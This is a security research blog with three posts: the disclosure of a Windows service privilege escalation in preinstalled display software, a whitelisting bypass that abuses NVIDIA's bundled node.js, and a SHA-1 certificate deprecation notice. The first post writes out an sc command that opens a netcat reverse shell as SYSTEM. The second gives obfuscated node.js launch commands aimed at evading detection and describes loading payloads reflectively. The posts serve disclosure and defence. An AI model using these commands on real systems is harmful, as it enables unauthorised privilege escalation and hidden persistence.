Tuesday, April 25, 2017

What unites HP, Philips and Fujitsu? One service and millions of vulnerable devices.

Yet another windows service privilege escalation?

During Windows client audits, it is quite common to try to find a way to escalate privileges in first place, to widen the attack surface and prepare for more sophisticated attacks (lateral movement, privilege escalation, rise and repeat). Besides known exploits in various kinds of software, it is always interesting to check for the low hanging fruits on the privilege escalation tree. Those sweet fruits include weak file- and folder permissions, unquoted service paths, or as described in this blogpost, weak service permissions, which can all lead to privilege escalation on Windows machines.

Those low hanging fruits appear on a regular basis in the life of a penetration tester and they are normally not that sophisticated from a technical perspective.

The identified vulnerable Windows service, is pre-installed on millions of laptops disguised as branded bloatware*. This changes a lot! Particularly due to the fact that the privilege escalation is now not limited to a single misconfigured device in a random company environment anymore.

* The [...] term bloatware is also commonly used to refer to preinstalled software on a device, usually included by the hardware manufacturer, that is mostly unwanted by the purchaser.

Bloatware, a common Cinderella Subject

Bloatware are those pieces of software, which are pre-installed on all your devices and nobody really makes use of them. Depending on the hardware vendor, some ship with a lot of bloatware and some try to keep their devices clean. But there is one thing, which have most of those pre-installed pieces of software in common, they are not self developed by the hardware vendor, but rather acquired from 3rd parties and as everybody should know it is very important to test self-developed as well as externally developed programs before going live. It is also very important that already at the point of the assignment of the application the security requirements have to be declared bindingly to the contractor. Before going live the contractor has to be obligated to supply a test installation of the system, which can undergo a security related approval test, conducted by security experts.

The past has already shown us, that such 3rd party bloatware acquired by OEM's is treated like a orphaned child and at best reviewed and tested by security experts fragmentary, or in the worst case the software gets rolled out without a proper security review at all. [1] [2] [3] 

A virtual on screen display, that can't be dangerous, right... RIGHT?

The vulnerability, described in this blogpost, was found in a core module of a so called virtual on screen display (vOSD). The purpose of a virtual on screen display is to replace the hardware adjustment buttons on screens, notebooks, smartphones and other kinds of displays. This should allow an user to quickly manage certain screen parameters (e.g. Rotation, Alignment, Color Values, Gamma values, Color temperature, Color saturation, Brightness, etc) with a simple piece of software, instead of struggling around with the hardware buttons on the display.

Portrait Displays Inc., the company responsible for developing the vulnerable software, describes their product as follows:

To get the most out of your display, it is important to set it up properly for your particular room lightning, display placement, and vision. Using the buttons on the edge of the display can be confusing, if not difficult.
Display Tune's OSD Enhancement takes all of the display's button functions and transfers them to the screen, where simple buttons and sliders make screen adjustments a breeze.

That doesn't sound too dangerous right? Changing the colors of a display is nothing what an attacker can use to attack a single PC, or a whole company environment. That's probably exactly what some big OEM's thought as well, while acquiring the vulnerable software. May he be shamed who thinks badly of it.


The exploitation itself is not too special, so nothing new to see here. For the sake of completeness, the way how the vulnerability was discovered and exploited is described below.

To identify the vulnerable Portrait Display SDK service, which is packaged by Portrait Display Inc. for various OEM's as a core package for virtual on screen displays, the permissions of the Portrait Display SDK service were retrieved with the built-in Windows command "sc". The output of the command for the vulnerable service can be seen below:






By "converting"[4] [5] the Security Descriptor Definition Language into human readable words, it is possible to identify the following permissions for the PdiService:

RW NT AUTHORITY\Authenticated Users


RW BUILTIN\Administrators



Due to the fact, that every authenticated user has write access on the service, an attacker is able to execute arbitrary code by changing the services binary path. Moreover, the Pdiservice is executed with SYSTEM permissions, resulting in privilege escalation.

The workflow to execute arbitrary code with elevated SYSTEM privileges is as follows:

1) Stop Service

sc stop pdiservice

2) Alter service binary path

sc config pdiservice binpath= "C:\nc.exe -nv $IP $PORT -e C:\WINDOWS\System32\cmd.exe"

3) Start Service

sc start pdiservice

4) Profit

The possibilities are endless, other useful payloads are the creation of new users, adding users to groups, changing privileges etc. All of the commands are executed with SYSTEM privileges.

The above commands were executed by the "sectester" user who doesn't have administrative privileges (it's a low privileged standard user). As the last figure shows, the user successfully escalated his privileges to SYSTEM.

One service to rule them all

One interesting fact is that this is not happening for the first time that pre-shipped bloatware has built-in vulnerabilities, or "undocumented features"[1] [2] [3]
It is quite juicy to observe, that companies selling millions of notebooks, PCs and convertibles simply do not care (enough) about security. The affected companies do have a net worth of multiple billions, but they do not have a few thousand euros/dollars/yen to conduct a proper security review on the software and services, they are acquiring from 3rd parties. This vulnerability would have been identified immediately in a thorough security review of the application/service if an audit would have been conducted by security experts before shipping devices with this software. Even automated vulnerability scans would detect such weak service permissions [6] [7].

But it seems that the problem is not limited to this service described in this blogpost. A lot of other services from big players are affected as well, the problem is that those vulnerabilities are most of the time downplayed or even ignored (e.g Dell's DellRctlService [8], or the Lansweeper Service [9] are/were affected from the exact same vulnerability but no one really noticed and the problem itself was downplayed).


There are two ways to get rid of the vulnerability.

Vendor Patch

The vendor provided a patch for the vulnerable software on their website: http://www.portrait.com/securityupdate.html


To quickly get rid of the vulnerability, the permissions of the service can be altered with the built-in windows command "sc".
To completely remove the permissions of the "Authenticated Users" group, the following command can be used:

This results in the following set of permissions:

RW BUILTIN\Administrators

Affected Vendors/Software

The vendor confirmed that at least the following binaries are vulnerable

Fujitsu DisplayView Click Version 6.0

build id: dtune-fts-R2014-04-22-1630-07,6.01
build id: dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite Version 5

build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id: dtune-fus-R2017-04-01-1212-32

HP Display Assistant Version 2.1

build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22 and above

HP My Display Version 2.01

build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and above

Philips Smart Control Premium Versions with issue: 2.23

build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07

The following pieces of software are using the Portrait Displays SDK Service, SEC Consult did not evaluate if those packages are vulnerable as well:

-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6

Final Words

In the end, we want to thank Portrait Displays Inc. for resolving the issue in a professional way and responding regularly by providing continuous updates about the current state of the patch, as well as realizing that this vulnerability is critical instead of playing it down like other vendors have done in the past [8][9]. This is crucial for a well working responsible disclosure process. Please review the vendor communication timeline for more details [10].

We would also like to thank CERT/CC for setting up the encrypted communication channel between Portrait Displays Inc, as well as providing a CVE (CVE-2017-3210) and a CERT VU (http://www.kb.cert.org/vuls).

This research was done by Werner Schober on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at: https://sec-consult.com/en/Career.htm


[1] https://duo.com/blog/out-of-box-exploitation-a-security-analysis-of-oem-updaters

[2] https://www.kb.cert.org/vuls/id/294607

[3] https://forums.lenovo.com/t5/Security-Malware/Potentially-Unwanted-Program-Superfish-VisualDiscovery/m-p/1860408#M1697
[4] https://msdn.microsoft.com/en-us/library/windows/desktop/aa379567(v=vs.85).aspx

[5] https://msdn.microsoft.com/en-us/library/windows/desktop/aa379570(v=vs.85).aspx

[6] https://www.tenable.com/plugins/index.php?view=single&id=65057

[7] https://github.com/PowerShellMafia/PowerSploit/tree/dev/Privesc

[8] http://en.community.dell.com/support-forums/software-os/f/4997/t/19992760

[9] https://www.lansweeper.com/forum/yaf_postst7658_ACL-on-Lansweeper-Service-Folder--import-folder.aspx#post32119

[10] https://sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170425-0_Portrait_Displays_SDK_Privilege_Escalation_v10.txt 

Thursday, April 20, 2017

Abusing NVIDIA's node.js to bypass application whitelisting

Application Whitelisting

Application whitelisting is an important security concept which can be found in many environments during penetration testing. The basic idea is to create a whitelist of allowed applications and after that only allow the execution of applications which can be found in that whitelist. This prevents the execution of dropped malware and increases therefore the overall security of the system and network.

A very commonly used solution for application whitelisting is Microsoft AppLocker. Another concept is to enforce code and script integrity via signatures. This can be achieved on Microsoft Windows 10 or Server 2016 with Microsoft Device Guard.

SEC Consult Vulnerability Lab is doing research in this area since several years, bypass techniques were already presented in 2015 and 2016 at conferences such as CanSecWest, DeepSec, Hacktivity, BSides Vienna and IT-SeCX, see [1].

Knowing these bypass techniques is really important for administrators who maintain such protected environments because special rules must be applied to prevent these attacks.

Other good and recommended sources of known bypass techniques and hardening guides are blog posts from Casey Smith (subtee) [2], Matt Nelson (enigma0x3) [3] and Matt Graeber (mattifestation) [4].

NVIDIA's node.js

During a quick research in a different area, I came across a system which had NVIDIA drivers installed. The following executable gets installed by NVIDIA:

%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
This is a renamed version of node.js (but signed by NVIDIA Corporation) which can be verified via the meta data of the file:

That means we can find node.js on systems with NVIDIA drivers installed. Since this file is already on the system and it has a valid signature, it will be whitelisted by the application whitelisting solution.

Nowadays, the most common technique to bypass application whitelisting is to start PowerShell, because the target code can be passed inside arguments, it has full access to the Windows API, it is a signed binary from Microsoft and it can be found on all newer systems. However, it’s the first binary which gets removed from the whitelist by administrators, PowerShell v5 provides very good logging (attack detection and forensic), Device Guard UMCI (user mode code integrity) places PowerShell in Constrained Language mode and Antivirus solutions monitor malicious invocations of PowerShell.

Nearly similar PowerShell advantages can be achieved by abusing node.js from NVIDIA if the target system has these drivers installed. It can be started in interactive mode which means that scripts can be passed via pipe (payloads are not written to disk). For example, the following command starts the calculator via node.js:

echo require('child_process').exec("calc.exe") | "%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i 

From attacker perspective, this opens two possibilities. Either use node.js to directly interact with the Windows API (e.g. to disable application whitelisting or reflectively load an executable into the node.js process to run the malicious binary on behalf of the signed process) or to write the complete malware with node.js. Both options have the advantage, that the running process is signed and therefore bypasses anti-virus systems (reputation-based algorithms) per default.

Writing malware completely in node.js has the great side-affect, that NVIDIA already installs addons with useful functions such as:
  • WebcamEnable (NvSpCapsAPINode.node) 
  • ManualRecordEnable (NvSpCapsAPINode.node) 
  • GetDesktopCaptureSupport (NvSpCapsAPINode.node) 
  • SetMicSettings (NvSpCapsAPINode.node) 
  • RecordingPaths (NvSpCapsAPINode.node) 
  • CaptureScreenshot (NvCameraAPINode.node) 
However, to get the full power of the Windows API, we can write addons in C/C++ for node.js:

Node.js Addons are dynamically-linked shared objects, written in C or C++, that can be loaded into Node.js using the require() function, and used just as if they were an ordinary Node.js module. They are used primarily to provide an interface between JavaScript running in Node.js and C/C++ libraries. [5]

That means node.js has full access to the Microsoft Windows API and reflective DLL injection is possible.

To load such an Addon the path to the .node file must be passed to the require() function. Node files are normal PE files with some special exported functions, but it’s also possible to load any .dll file with one of the below code lines (an error will be thrown but DllMain gets executed):


A drawback of the reflective DLL injection attack is that it requires one file write because as far as of my knowledge node.js doesn’t support execution of modules from memory (or to directly access the Windows API). It’s therefore required to drop one loader-module to disk, then load this module which acts as a wrapper for the Windows API. Using the dropped module, the script can then access the Windows API and reflectively load any executable / library into the signed node.js process (similar concept to Invoke-ReflectivePEInjection.ps1 from PowerSploit, see [6]).

Please note, that the above approach drops one file to disk, however, this is only a legit node.js module. The real malware can afterwards be loaded via the loader-module from memory and is therefore never written to disk.

The file can be dropped to the following location which is writeable by standard users:

%systemdrive%\ProgramData\NVIDIA Corporation\Downloader\
Overcoming the “issue” of the one-file-write is not trivial. It’s not really a big problem (e.g. the dropped file is not malicious and will not be detected by an AntiVirus solution), however, it could block execution in some cases (e.g. DLL AppLocker rules). Such DLL rules can be bypassed in several ways depending on the used product and configuration. For example, it's possible to abuse AppLocker default rules which allow execution of all files in %windir%/*. Therefore, an attacker can drop his node module to the writeable tasks folder:

There are many similar writeable locations inside the %windir% folder. Let's assume that an administrator deny all these writeable locations by adding exclude rules for them. Is the system now secure?

The answer is NO because ADS can be abused. Since we can create a sub-folder in %windir%\tracing, we can create an ADS on the folder (for an explanation on ADS see Alex Inführ's blog post [7]). This can be used to bypass additional restrictions / monitoring rules. Let’s say we drop the following file:

All common APIs return as base folder %windir% and not %windir%\tracing which lets the module look like a file from the normal windows folder (however, a normal user does not have write permissions to %windir% ! ). 

This trick is already known and was described by James Forshaw on a different subject (unfortunately, I didn’t found the original post from him on it but in general all his posts are highly recommended).

What does that mean? Even if an administrator added additional exclude rules to the default rules to block writeable folders, we can still bypass AppLocker with the ADS.

The following figure shows this (AppLocker is configured to prevent C:\Windows\tracing\* and several other writeable locations): 

Here Microsoft's control.exe is used to load the library, however, it can also be loaded via node js (and using the fs-module it's possible to create the ADS).

Another possibility is to overwrite an existing library if application whitelisting was configured only based on paths (because of updates).

Here are some additional methods which I tried to avoide the file write at all:

Some methods which I tried for in-memory files 

UNC paths:

The code first tries to load the addon via SMB (port 445) and use WebDav (port 80) as fall-back. Since outgoing SMB traffic is in most environments forbidden, it would be good to directly access the data via WebDav (and it’s possible to create a WebDav server in JavaScript with node.js, but then firewall problems can occur). This is possible via paths such as the following two:


A good explanation why these paths work can be found at [8].

However, both path formats are not allowed inside node.js (the code later calls lstat which throws a file not found exception). Moreover, Microsoft internally writes the file to %localappdata%, making the approach useless to achieve file-less exploitation.

Another idea was to abuse named pipes which can be created with node.js code, however, named pipes are not seekable and therefore LoadLibrary() / require() fail.

Calling CreateFile with FILE_ATTRIBUTE_TEMPORARY and FILE_FLAG_DELETE_ON_CLOSE creates in most cases an in-memory file, however, node.js does not provide a way to pass these flags inside JavaScript code.

For people wondering why NVIDIA ships with node.js

At startup, NVIDIA starts a webserver via node.js (providing functionality like the above mentioned webcam control) on a randomized port. To protect against attacks a random secret cookie is created and must be passed to interact with the service. The information about the used port number and cookie value can be extracted from the following file:

%localappdata%\NVIDIA Corporation\NvNode\nodejs.json 


For red teamers, it’s the recommended approach to use the fs module from node.js to write a loader addon to disk which gives access to the Microsoft Windows API from JavaScript code. Then JavaScript code can be used to download the (encrypted) payload from the internet and with the Windows API the JavaScript code can reflectively load the payload into its own process space and execute it.

Node.js itself can be started via one of the public known techniques (see our slides at [1]), for example .chm, .lnk, .js, .jse, Java applets, macros, from an exploited process, pass-the-hash and so on.

Standard obfuscation tricks can be used to further hide the invocation. For example, the following code starts calc.exe but tries to further hide:

echo "outdated settings;set colors=";c=['\162\145\161\165\151\162\145','\143\150\151\154\144\137\160\162\157\143\145\163\163','\145\170\145\143','\143\141\154\143'];global[c[0]](c[1])[c[2]](c[3]);"; set specialChars='/*&^"|;"%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i

Such code can be used as persistence mechanism (auto start) because the called binary is signed by NVIDIA and will be considered as safe. Of course, additional anti-monitoring tricks such as ^ or %programdata:~0,-20% can be used somewhere inside the above command line to further prevent detection, however, such code is in my opinion traitorous.

For security consultants, it's recommended to search for node.js binaries (file size > 10 MB and binary contains Node.js strings) during client security audits to identify other vendors which ship node.js to clients.

For blue teamers, it’s recommended to remove the file from the whitelist (if possible) or at least monitor it’s invocation.

This research was done by René Freingruber (@ReneFreingruber) on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at: https://sec-consult.com/en/Career.htm


[1] https://cansecwest.com/slides/2016/CSW2016_Freingruber_Bypassing_Application_Whitelisting.pdf

[2] http://subt0x10.blogspot.co.at/

[3] https://enigma0x3.net/

[4] http://www.exploit-monday.com

[5] https://nodejs.org/api/addons.html 

Wednesday, January 18, 2017

Last call to replace SHA-1 certificates

(c) iStock 629455088

All major browsers will stop accepting SHA-1 certificates in January/February. An average user will then not be able to distinguish between an invalid certificate (e.g. a certificate from an attacker) and a valid certificate that is using a SHA-1 hash. Effectively, this means that Internet services that still use SHA-1 certificates will become unusable for a large portion of users within the next few weeks.

Specifically, the following dates apply for the major browsers:

Browser vendors have provided ways to still use SHA-1 certificates issued by an internal CA (often used for e.g. an internal services like webmail). However, this is a temporary measure as e.g. Google Chrome will finally remove support for SHA-1 latest in 2019.

The following Censys query demonstrates, that there are still many TLS services world-wide that are affected by this. The query includes all HTTPS services with certificates that are a) not expired, b) that would otherwise be trusted by browsers and c) are signed using the SHA-1 hash algorithm:

Source: censys.io

Is this necessary?

By disabling the trust for SHA-1 certificates, browser vendors try to prevent a situation similar to what was happening in 2008. Well before 2008, is was commonly known that the MD5 hash algorithm exhibits serious weaknesses. Despite that fact, many certificate authorities issued MD5 certificates and major browsers accepted them. The attacks against MD5 have continuously improved over the years until in 2008, a group of researchers used the weaknesses in MD5 to successfully forge a certificate. Using this certificate, the researchers were able to issue arbitrary certificates for any service on the Internet. We know now that any criminal organisation that also conducted the same research and implemented a similar attack could have successfully intercepted arbitrary TLS connections (e.g. HTTPS) on the Internet.

There are many parallels between the situation then and the situation we now have with SHA-1. The first weaknesses in SHA-1 have been published in 2005. Since then, the attacks on weaknesses in SHA-1 have continuously been improved. In 2015 researchers estimated, that finding a collision in SHA-1 would cost between 75,000 $ and 120,000 $. A collision does not necessarily allow for a practical attack, being able to find a collision severely undermines the security of SHA-1. It is very hard to estimate how long it will take to be able to advance the current attacks to successfully forge a certificate. Moreover, it is possible that organisations outside of the academia already have knowledge of even more advanced attacks against SHA-1.

Therefore, it is necessary for browser vendors to disallow the use of SHA-1 certificates now, before we are in a situation similar to the situation in 2008. Google even goes so far as to warn against "the imminent possibility of attacks that could directly impact the integrity of the Web PKI".

The abandonment of the SHA-1 hash algorithm also affects code signing certificates. Although Windows code signing certificates with SHA-1 signatures can still be obtained, Certificate Authorities would probably be forced to revoke all SHA-1 certificates once a practical attack is known. This especially affects versions of Microsoft Windows that do not support any other hash algorithm for code signing (i.e. legacy Windows versions such as XP SP3, Windows Server 2008 and Windows Vista).


As a countermeasure we recommend to immediately replace affected certificates!

If the certificates are not replaced by 2017-02-14 (for IE11 / Edge at least, or even earlier for other browsers), a large portion of the users will not be able to access the affected services.

To test whether your Internet services are affected by this issue and other issues in the TLS configuration, SSLLabs provides a very useful tool that can be found here.